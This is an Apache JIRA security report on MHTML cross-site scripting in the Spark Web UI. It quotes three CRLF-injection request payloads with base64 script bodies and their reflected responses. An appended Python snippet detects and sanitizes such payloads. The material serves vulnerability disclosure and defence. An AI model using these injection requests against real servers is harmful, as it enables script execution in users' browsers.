[ https://issues.apache.org/jira/browse/SPARK-20393?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]
Sean Owen updated SPARK-20393:
------------------------------
    Fix Version/s:     (was: 2.3.0)
                       2.2.0

> Strengthen Spark to prevent XSS vulnerabilities
> -----------------------------------------------
>
>                 Key: SPARK-20393
>                 URL: https://issues.apache.org/jira/browse/SPARK-20393
>             Project: Spark
>          Issue Type: Bug
>          Components: Web UI
>    Affects Versions: 1.5.2, 2.0.2, 2.1.0
>            Reporter: Nicholas Marion
>            Assignee: Nicholas Marion
>            Priority: Minor
>              Labels: security
>             Fix For: 2.2.0
>
>
> Using IBM Security AppScan Standard, we discovered several easy-to-recreate
> MHTML cross-site scripting vulnerabilities in the Apache Spark Web GUI
> application, and these vulnerabilities were found to exist in Spark versions
> 1.5.2 and 2.0.2, the two levels we initially tested. A cross-site scripting
> attack is not really an attack on the Spark server as much as an attack on
> the end user, taking advantage of their trust in the Spark server to get them
> to click on a URL like the ones in the examples below. So whether the user
> could or could not change lots of stuff on the Spark server is not the key
> point. It is an attack on the user themselves. If they click the link, the
> script could run in their browser and compromise their device. Once the
> browser is compromised it could submit Spark requests, but it also might not.
>
> https://blogs.technet.microsoft.com/srd/2011/01/28/more-information-about-the-mhtml-script-injection-vulnerability/
>
> {quote}
> Request:
> GET /app/?appId=Content-Type:%20multipart/related;%20boundary=_AppScan%0d%0a--_AppScan%0d%0aContent-Location:foo%0d%0aContent-Transfer-Encoding:base64%0d%0a%0d%0aPGh0bWw%2bPHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw%2b%0d%0a HTTP/1.1
>
> Excerpt from response:
> <div class="row-fluid">No running application with ID Content-Type: multipart/related;
> boundary=_AppScan
> --_AppScan
> Content-Location:foo
> Content-Transfer-Encoding:base64
>
> PGh0bWw+PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw+
> </div>
>
> Result: In the above payload the BASE64 data decodes as:
> <html><script>alert("XSS")</script></html>
>
> Request:
> GET /history/app-20161012202114-0038/stages/stage?id=1&attempt=0&task.sort=Content-Type:%20multipart/related;%20boundary=_AppScan%0d%0a--_AppScan%0d%0aContent-Location:foo%0d%0aContent-Transfer-Encoding:base64%0d%0a%0d%0aPGh0bWw%2bPHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw%2b%0d%0a&task.pageSize=100 HTTP/1.1
>
> Excerpt from response:
> Content-Type: multipart/related;
> boundary=_AppScan
> --_AppScan
> Content-Location:foo
> Content-Transfer-Encoding:base64
>
> PGh0bWw+PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw+
>
> Result: In the above payload the BASE64 data decodes as:
> <html><script>alert("XSS")</script></html>
>
> Request:
> GET /log?appId=app-20170113131903-0000&executorId=0&logType=Content-Type:%20multipart/related;%20boundary=_AppScan%0d%0a--_AppScan%0d%0aContent-Location:foo%0d%0aContent-Transfer-Encoding:base64%0d%0a%0d%0aPGh0bWw%2bPHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw%2b%0d%0a&byteLength=0 HTTP/1.1
>
> Excerpt from response:
> ==== Bytes 0-0 of 0 of /u/nmarion/Spark_2.0.2.0/Spark-DK/work/app-20170113131903-0000/0/Content-Type: multipart/related; boundary=_AppScan
> --_AppScan
> Content-Location:foo
> Content-Transfer-Encoding:base64
>
> PGh0bWw+PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw+
>
> Result: In the above payload the BASE64 data decodes as:
> <html><script>alert("XSS")</script></html>
> {quote}
>
> security@apache was notified and recommended a PR.

--
This message was sent by Atlassian JIRA
(v6.3.15#6346)
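As an added example (not part of the JIRA issue, and not Spark's own fix), the Python below shows the two things a defender wants from this report: a log-side check that flags query parameters carrying CR/LF plus injected MHTML headers and decodes the base64 body to see what a browser would have rendered, and an illustrative sanitizer for values a UI echoes back. `REQUEST_LINES` is constructed from the report's first request plus a benign page load; `inspect_request` and `sanitize_reflected` are hypothetical names.

```python
import base64
import html
import re
from urllib.parse import unquote

# Constructed access-log request lines modelled on the requests in the report:
# the first carries the injected MHTML payload, the second is a normal page load.
REQUEST_LINES = [
    "GET /app/?appId=Content-Type:%20multipart/related;%20boundary=_AppScan"
    "%0d%0a--_AppScan%0d%0aContent-Location:foo%0d%0aContent-Transfer-Encoding:"
    "base64%0d%0a%0d%0aPGh0bWw%2bPHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw%2b"
    "%0d%0a HTTP/1.1",
    "GET /history/app-20161012202114-0038/stages/stage?id=1&attempt=0"
    "&task.sort=Index&task.pageSize=100 HTTP/1.1",
]

MHTML_HEADER = re.compile(r"content-type:\s*multipart/related", re.IGNORECASE)
BASE64_TOKEN = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def inspect_request(line):
    """Return (param, reason, decoded_payload) tuples for suspicious query parameters."""
    parts = line.split()
    target = parts[1] if len(parts) > 1 else line
    query = target.partition("?")[2]
    findings = []
    for pair in query.split("&"):          # split before decoding so literal ';' stays in values
        name, _, raw_value = pair.partition("=")
        value = unquote(raw_value)          # %0d%0a becomes a real CR LF
        if "\r" not in value and "\n" not in value:
            continue                        # UI parameters never legitimately contain CR/LF
        reason, decoded = "CRLF in parameter", None
        if MHTML_HEADER.search(value):
            reason = "CRLF with injected MHTML multipart headers"
            # What the browser would render follows the first blank line
            _, _, body = value.partition("\r\n\r\n")
            first = body.strip().splitlines()[0] if body.strip() else ""
            if BASE64_TOKEN.match(first):
                try:
                    decoded = base64.b64decode(first).decode("utf-8", "replace")
                except ValueError:
                    decoded = None          # malformed base64: still report the CRLF finding
        findings.append((name, reason, decoded))
    return findings


def sanitize_reflected(value):
    """Illustrative defence for values echoed into a page: drop CR/LF, then HTML-escape."""
    return html.escape(value.replace("\r", "").replace("\n", ""), quote=True)
```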